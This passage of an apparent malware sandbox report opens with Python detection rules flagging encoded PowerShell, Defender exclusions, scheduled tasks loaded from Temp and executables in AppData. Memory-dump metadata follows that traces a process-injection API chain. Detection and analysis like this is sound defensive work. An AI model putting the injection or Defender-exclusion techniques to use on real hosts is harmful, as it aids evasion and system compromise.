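SCHTASKS_XML = re.compile(r'(?i)\bschtasks(?:\.exe)?"?\s.*?/Create\b.*?/XML\s+(?:"([^"]+)"|(\S+))')
TEMP_DIR = re.compile(r"(?i)\\AppData\\Local\\Temp\\")
USER_EXE = re.compile(r"(?i)^C:\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\[^\\]+\.(?:scr|exe|pif|com)$")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none / it is malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way powershell.exe expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _visible_text(rec: ProcRecord) -> str:
    """Command line plus its decoded -EncodedCommand payload, so rules see both."""
    decoded = decode_encoded_command(rec.commandline)
    return rec.commandline if decoded is None else rec.commandline + "\n" + decoded


def check_record(rec: ProcRecord) -> List[str]:
    """Apply each rule to one process record; returns the names of the rules that fired."""
    findings: List[str] = []
    text = _visible_text(rec)
    if text != rec.commandline:
        findings.append("powershell_encoded_command")
    if MP_EXCLUSION.search(text):
        findings.append("defender_exclusion_added")
    m = SCHTASKS_XML.search(text)
    if m and TEMP_DIR.search(m.group(1) or m.group(2)):
        findings.append("schtasks_xml_from_temp")
    if rec.path.upper().endswith("\\EQNEDT32.EXE"):
        findings.append("equation_editor_started")
    if USER_EXE.match(rec.path):
        findings.append("binary_in_user_appdata")
    return findings


def run_all(records: List[ProcRecord]) -> Dict[int, List[str]]:
    return {r.target_id: check_record(r) for r in records}


def exclusions_covering_running_binaries(records: List[ProcRecord]) -> Dict[str, List[int]]:
    """Correlate every -ExclusionPath with the records whose image lives at or under it."""
    covered: Dict[str, List[int]] = {}
    for rec in records:
        for m in EXCLUSION_PATH.finditer(_visible_text(rec)):
            excl = (m.group(1) or m.group(2)).rstrip("\\").lower()
            hits = sorted({r.target_id for r in records
                           if r.path.lower() == excl or r.path.lower().startswith(excl + "\\")})
            if hits:
                covered[excl] = hits
    return covered
```

Add-MpPreference only succeeds with administrative rights, which every process in this report has (Has administrator privileges:true). On a live host the resulting exclusions can be listed with Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess, and each change is recorded as event 5007 in the Microsoft-Windows-Windows Defender/Operational log; the correlation in exclusions_covering_running_binaries is the check that turns a generic "exclusion added" alert into "exclusion added for a binary that is currently executing from a user-writable directory".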


                                                          Execution Graph

                                                          Execution Coverage:17.5%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:95
                                                          Total number of Limit Nodes:1
                                                          execution_graph (rendered graph data; entry node 2ed415 -> 2ed28d -> wrapper functions 2efa78 / 2efa88 / 2efaee). Every edge out of the wrappers ends in one of the following API-calling functions, which together are the process-injection chain behind the "Injects a PE file into a foreign processes" signature in the overview (this is a call graph and does not record call order):
                                                          • 7100ff -> 2ecd38 -> 2ecdbf: CreateProcessA
                                                          • 7106c3 -> 2ec872 / 2ec878 -> 2ec8bc: VirtualAllocEx
                                                          • 710297, 71020b (via 710408), 7104da -> 2ec998 / 2ec9a0 -> 2ec99b / 2ec9ec: WriteProcessMemory
                                                          • 710316 -> 2ecafa / 2ecb00 -> 2ecb4c: ReadProcessMemory
                                                          • 71083d, 710304 (via 710841) -> 2ec748 -> 2ec791: Wow64SetThreadContext
                                                          • 7101bf (via 710164), 71016c (via 710188), 7105ad (via 71056c) -> 2ec658 -> 2ec69c: ResumeThread

                                                          Control-flow Graph for the function at 1dc4c4 (calls 1d0da4, 1dd280, 1dc1ec, 1ddce9); rendered graph with executed/not-executed block colouring, node listing omitted.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$)"
                                                          • API String ID: 0-2204700639
                                                          • Opcode ID: 1e8c74ee68b2ef10fd46f81260d7a573d9e7a62af3ac4c2e37e66eafc23c9194
                                                          • Instruction ID: 8e6f3e4f4b2e5f1b82feb2225af702be5b41cb99f1f2438cdedc7fbb87360dae
                                                          • Opcode Fuzzy Hash: 1e8c74ee68b2ef10fd46f81260d7a573d9e7a62af3ac4c2e37e66eafc23c9194
                                                          • Instruction Fuzzy Hash: 5091E674E042098FDB08CFAAC8546DEFBB2FF89300F24942AD416AB355D7349945CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph for the function at 1db398 (no calls); rendered graph with executed/not-executed block colouring, node listing omitted.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$Lf#$Pc#
                                                          • API String ID: 0-3241689473
                                                          • Opcode ID: 854fda39457a9fb3976733423901e6477d84ad59027970c785b005a1eaad00d4
                                                          • Instruction ID: dbcebb3fa73f7f96441eeed081789ef768129aff9cef7e2432f96c046a7df080
                                                          • Opcode Fuzzy Hash: 854fda39457a9fb3976733423901e6477d84ad59027970c785b005a1eaad00d4
                                                          • Instruction Fuzzy Hash: 6E810271A0D250CBC7548B6CD8C16BABBF0EB41300F5A86ABE167C73A2D338D944DB12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph for the function at 1dc600 (calls 1d0da4, 1dd280, 1dc1ec, 1ddce9); rendered graph with executed/not-executed block colouring, node listing omitted.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$)"
                                                          • API String ID: 0-2204700639
                                                          • Opcode ID: 0dbbd88b74928967820d1e97128e1d0451450c02cedfe8e394d7f987b825e52a
                                                          • Instruction ID: e48c610476a270c53c3cec0cf2426957977527b9b6cd4ff265a1f874dc7454e6
                                                          • Opcode Fuzzy Hash: 0dbbd88b74928967820d1e97128e1d0451450c02cedfe8e394d7f987b825e52a
                                                          • Instruction Fuzzy Hash: 7A81C474E002099FDB48CFAAD984ADEFBB2FF88300F24942AD416AB358D7359945CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph for the function at 1dd280 (calls 1dd6f0, 1dd700, 1dd4d8, 1dd4c8); rendered graph with executed/not-executed block colouring, node listing omitted.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7Z/t$RWIK$[[bb
                                                          • API String ID: 0-1157992699
                                                          • Opcode ID: fedd3f6b845af5df849eb85bc1fd5495c8c59960841ee808711c614459603264
                                                          • Instruction ID: ed4a836610eea4ff5f38b42101ca33a0374c34d3238f357e13dae0f628cbf266
                                                          • Opcode Fuzzy Hash: fedd3f6b845af5df849eb85bc1fd5495c8c59960841ee808711c614459603264
                                                          • Instruction Fuzzy Hash: B66126B4E0564A8FCB08CFAAD4505AEFFF2EF89300F24D46AD419A7255D7348A42CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <g#
                                                          • API String ID: 0-1525369332
                                                          • Opcode ID: 2a1c7f062223f768c90ee86af5b44c9e60985a11cd1360d03c57caa3b92b28f3
                                                          • Instruction ID: 0f0e3283c59c934bfd57e5e703419cee19a5ede830726c8924c5ce9bccdfbc00
                                                          • Opcode Fuzzy Hash: 2a1c7f062223f768c90ee86af5b44c9e60985a11cd1360d03c57caa3b92b28f3
                                                          • Instruction Fuzzy Hash: 2B023471A28285DFCB04CF69C8586ADBBF1FF89301F64846BE48597292D374CA92CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 7606b126b2392bca00c4b376ce1e3638517d705d699e8b4129efdafc7b60b55e
                                                          • Instruction ID: 799310868325f68b150ab3f9850cc5c2bfac7c2ac85f42b3df21b63c63fabd48
                                                          • Opcode Fuzzy Hash: 7606b126b2392bca00c4b376ce1e3638517d705d699e8b4129efdafc7b60b55e
                                                          • Instruction Fuzzy Hash: 7DD11870D1420ADFCB08DFA9D4848AEFBB2FF89301B219556D516AB315D734EA82CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p .
                                                          • API String ID: 0-3806500911
                                                          • Opcode ID: e2f21b1cd6944978a1550a1c1fc6cb59e3bba2ece7872bc860c16a47c479f97a
                                                          • Instruction ID: a047152104daf7d2841fb36cee160d0f1de05dac4f8da30c2a401bfeedf48812
                                                          • Opcode Fuzzy Hash: e2f21b1cd6944978a1550a1c1fc6cb59e3bba2ece7872bc860c16a47c479f97a
                                                          • Instruction Fuzzy Hash: A0A15970E25248DFCB08CFA6E58499DFBB2FF89300F64A42AE416B7264D7709925CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57957c66792f01bfcf2ca5af1eda04b4b7ee56318f5a058031fc6772d8ecafe7
                                                          • Instruction ID: 8bd628093e91fd15f0b2d5b7999e04919d620802817baabe4600700137dad354
                                                          • Opcode Fuzzy Hash: 57957c66792f01bfcf2ca5af1eda04b4b7ee56318f5a058031fc6772d8ecafe7
                                                          • Instruction Fuzzy Hash: 37810374E5525ACFCB04CFAAD9809EEFBB2FB88300F60996AD401A7354D3749962CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: faf8e78971bcc73c083b68ee49f56de90289d49129887de6ca1352ab91dc9fcf
                                                          • Instruction ID: 8692599309619fa973362ad57eaed89430299a11b6a8291137650bfe3efb197d
                                                          • Opcode Fuzzy Hash: faf8e78971bcc73c083b68ee49f56de90289d49129887de6ca1352ab91dc9fcf
                                                          • Instruction Fuzzy Hash: BF811474E5525ACFCB04CFAAD9809EEFBB2FB88300F50996AD401A7358D3749962CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13a9e75dd2c3ead3773c22b3002398952b5e7c88fd4351c83ed79caee1425ebb
                                                          • Instruction ID: e11a2cd9cf157f2f41819cc406f218118f2e6a4c80ba3e615de3621273fbe838
                                                          • Opcode Fuzzy Hash: 13a9e75dd2c3ead3773c22b3002398952b5e7c88fd4351c83ed79caee1425ebb
                                                          • Instruction Fuzzy Hash: C07125B5E0120ADFCB08CFD9E4819AEFBB2FB88314F21946AD415AB354C7349A41CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 102aaa33e3c1b2ed6322d1a1d59746b3a5059b800b189867bf19a4a379324392
                                                          • Instruction ID: 0da6c9ac3ba98eb583088a8efc6f1c3c57fd02ba24d7eed90a0f1e39d74324ff
                                                          • Opcode Fuzzy Hash: 102aaa33e3c1b2ed6322d1a1d59746b3a5059b800b189867bf19a4a379324392
                                                          • Instruction Fuzzy Hash: 1C21EBB1E056588BEB18CFABD8542DEFBF3AFC9310F14C16AD409AA264DB340A55CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$ fp$ fp$ fp$ fp$ fp$Tep$Tep$Tep$XXp$XXp$XXp$XXp$XXp$XXp$XXp$$p$$p$$p$$p$$p$$p$b$$h#
                                                          • API String ID: 0-514228862
                                                          • Opcode ID: 9af73b8498a2e5037a685cc115b2e4f034ab21065a69a1386a56cc2fb88330f3
                                                          • Instruction ID: 5bc04e4936319881c04ceda61f0d993bf86b9c97e858f3179251f554a8b56825
                                                          • Opcode Fuzzy Hash: 9af73b8498a2e5037a685cc115b2e4f034ab21065a69a1386a56cc2fb88330f3
                                                          • Instruction Fuzzy Hash: C922AE30B04258DFDB18DBA8C855BADBBB2BF85300F698567E406AB399CB70DC41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$Tep$Tep$Tep$Tep$Tep$$p$$p$$p$$p$h#$h#
                                                          • API String ID: 0-1874645747
                                                          • Opcode ID: 8da457b29321d6e092b539b85e74c8c86d774a05cb33805df8e9457da2dfbab4
                                                          • Instruction ID: 2e0576c058865d109d01e77526ebdf9b0e01dc3b256b9312514c1360cc11ed37
                                                          • Opcode Fuzzy Hash: 8da457b29321d6e092b539b85e74c8c86d774a05cb33805df8e9457da2dfbab4
                                                          • Instruction Fuzzy Hash: 0322C330B04254DFDB099B68D859BAEBBB2AF88301F25846BE806DB3D5CF749C41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph for the function at 1d9d7c (calls 1daff9); rendered graph with executed/not-executed block colouring, node listing omitted.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3426324077
                                                          • Opcode ID: 5cedbe83a67b328a51e2c281625f265f77390cfca6b0e9ee08f01ddc2d3af053
                                                          • Instruction ID: a276bbb0eab3417e98c85e7c4d5e2e1b6c9e0c4815500d9df905a8fc5d7c258a
                                                          • Opcode Fuzzy Hash: 5cedbe83a67b328a51e2c281625f265f77390cfca6b0e9ee08f01ddc2d3af053
                                                          • Instruction Fuzzy Hash: D4818D30A04258DFDB28CBE8D445BADBBB2FF85301F6A8567E412AB395CB709C41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph for the function at 1d1903 (no calls); rendered graph with executed/not-executed block colouring, node listing omitted.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3004817860
                                                          • Opcode ID: 0537fc9c7a9f778716ffaa4ee82f0f287fc49c4f8ccdf9da2ebc1ce80b8fbe76
                                                          • Instruction ID: 512035cec50d749b66645fe6a497072e1bf34ae2fe0beca9cf6199de66efd77e
                                                          • Opcode Fuzzy Hash: 0537fc9c7a9f778716ffaa4ee82f0f287fc49c4f8ccdf9da2ebc1ce80b8fbe76
                                                          • Instruction Fuzzy Hash: AC817930A04258FFDB18CB94D4A5BACB7B2BF80315F6A8067E852AB395D7709C81DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3004817860
                                                          • Opcode ID: d1c20d6d80a80f60646461bb09927fa8f15ec972677bcb322f3da820a049769b
                                                          • Instruction ID: e6c5aefc20b4c6d3a30a6542b4c38e3991fadcaed7c78d405c5feaa68f51462e
                                                          • Opcode Fuzzy Hash: d1c20d6d80a80f60646461bb09927fa8f15ec972677bcb322f3da820a049769b
                                                          • Instruction Fuzzy Hash: CF717D30B04258DFDB28CBA8D445BADBBB2FF85301F6A8567E412AB395CB709C41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002ECFFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: W KF$W KF
                                                          • API String ID: 963392458-1084561633
                                                          • Opcode ID: 9f32ae2274baa417a49445e80a42b1082fd108017a8ce05b24e4f0f4f7ca62b4
                                                          • Instruction ID: 14634b129247994fa9a0e0046613cba4ba639588b821b6c100aa98dedadb01e4
                                                          • Opcode Fuzzy Hash: 9f32ae2274baa417a49445e80a42b1082fd108017a8ce05b24e4f0f4f7ca62b4
                                                          • Instruction Fuzzy Hash: 9CA13671D102598FCF24CFA9C841BEEBBF2BB09310F1491A9E859B7240D7749A96CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8p$8p$8p$lb#
                                                          • API String ID: 0-5103522
                                                          • Opcode ID: 500c7192933dafdc12b51c6bb9d7970b00855078ae617ac2cf1189f1bcaa2879
                                                          • Instruction ID: c44364d184ef8e966b413d61461f7dc8496a28cb8b82640f4632ded39bcd15ec
                                                          • Opcode Fuzzy Hash: 500c7192933dafdc12b51c6bb9d7970b00855078ae617ac2cf1189f1bcaa2879
                                                          • Instruction Fuzzy Hash: 4681E030A15258DFC704EFA8D858AAEBBF1EF45300F0585A7D4059B3A2DB74DA49CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h#
                                                          • API String ID: 0-958925979
                                                          • Opcode ID: cbc1f088290eda117a6eabc5a6d209198a0b2cc0856c264c1c8e21fbeb5abd63
                                                          • Instruction ID: 08301760f01dcf2839ecb7b8541c5eed261821837e66e8722a86937d776ac62d
                                                          • Opcode Fuzzy Hash: cbc1f088290eda117a6eabc5a6d209198a0b2cc0856c264c1c8e21fbeb5abd63
                                                          • Instruction Fuzzy Hash: D6819130B00214EFDB189B68D819BBEBBB2EF84305F658066E406EB395CF758C41DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h#
                                                          • API String ID: 0-958925979
                                                          • Opcode ID: 137fc3e5020a81a9dd73c4a20f43f8e88d60a836491dfd143bab6576bf339bb5
                                                          • Instruction ID: 343c56ccd0c7bae17dd3bfb933a66b77cd0104e7007d69f0a1e385d91ba5d95e
                                                          • Opcode Fuzzy Hash: 137fc3e5020a81a9dd73c4a20f43f8e88d60a836491dfd143bab6576bf339bb5
                                                          • Instruction Fuzzy Hash: 9D719230B002149FDB189B68D829BBEBAE2EFC4705F258166E905EB395CF75CC41CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECA73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID: W KF
                                                          • API String ID: 3559483778-3286359180
                                                          • Opcode ID: b8b6eef3ad4994e2bbac9e4775744ee18a2deab4e4c04b14f8385ef0db190b24
                                                          • Instruction ID: 17e837a2bebde2fb0f0c8212cdb6b84c7859bc33447bce24e809cf51f05db402
                                                          • Opcode Fuzzy Hash: b8b6eef3ad4994e2bbac9e4775744ee18a2deab4e4c04b14f8385ef0db190b24
                                                          • Instruction Fuzzy Hash: D841BBB5D002599FCF10CFA9D984AEEFBF1BB49314F24902AE814B7210D378AA55CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECA73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID: W KF
                                                          • API String ID: 3559483778-3286359180
                                                          • Opcode ID: f6efa41184304fcff0fbf2f376f1ea0a205a1b2d7d6f613e1ae856783428aacf
                                                          • Instruction ID: 2a67c29cf057a7ecde762c91fb54e8224f84ecc817e35991572d230aaf45ec59
                                                          • Opcode Fuzzy Hash: f6efa41184304fcff0fbf2f376f1ea0a205a1b2d7d6f613e1ae856783428aacf
                                                          • Instruction Fuzzy Hash: 9641ABB4D002599FCF00CFA9D984AEEFBF1BB49314F20942AE818B7210D774AA55CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECBB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID: W KF
                                                          • API String ID: 1726664587-3286359180
                                                          • Opcode ID: 46de93dc4c311fa6b75a25bcec1204194ddc3a2cf98ee8bf7ef955dc92364ec7
                                                          • Instruction ID: 39fcb1c176ecfb1cc74ff246c24d7dc2494f88cb04c46f77d66bff8afab11f9a
                                                          • Opcode Fuzzy Hash: 46de93dc4c311fa6b75a25bcec1204194ddc3a2cf98ee8bf7ef955dc92364ec7
                                                          • Instruction Fuzzy Hash: 7041BAB5D002589FCF10CFAAD984AEEFBB1BF49314F20942AE815B7210C375A956CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECBB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID: W KF
                                                          • API String ID: 1726664587-3286359180
                                                          • Opcode ID: 4c0f5843d73d4a4b40e8d3527cd9f4e32d267382fc649b0cb4f54325b87efe15
                                                          • Instruction ID: 80a52a3d3421a651c24f6c10380f96967182f06558cdf23e3d49fd487037665d
                                                          • Opcode Fuzzy Hash: 4c0f5843d73d4a4b40e8d3527cd9f4e32d267382fc649b0cb4f54325b87efe15
                                                          • Instruction Fuzzy Hash: A841ABB5D002589FCF10CFAAD984AEEFBB1BF49314F20942AE814B7210D775A955CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC922
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: W KF
                                                          • API String ID: 4275171209-3286359180
                                                          • Opcode ID: 85d10e2627c6a1a0e009cfe7fabd72f71e5248447f0c04606105c6e90e48c0c1
                                                          • Instruction ID: 8e913289fc7540e0e94402c890f81a8345e46c18d548328b0abff5e05de02f5a
                                                          • Opcode Fuzzy Hash: 85d10e2627c6a1a0e009cfe7fabd72f71e5248447f0c04606105c6e90e48c0c1
                                                          • Instruction Fuzzy Hash: 4D41AAB9D002489FCF10CFA9D984AEEFBB1AB49314F20942AE815B7214D375A916CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC922
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: W KF
                                                          • API String ID: 4275171209-3286359180
                                                          • Opcode ID: 90a1362077e4c27d74f4a2c7d3ca56aaad39b5d52dc4e2fcc647784c2174d20e
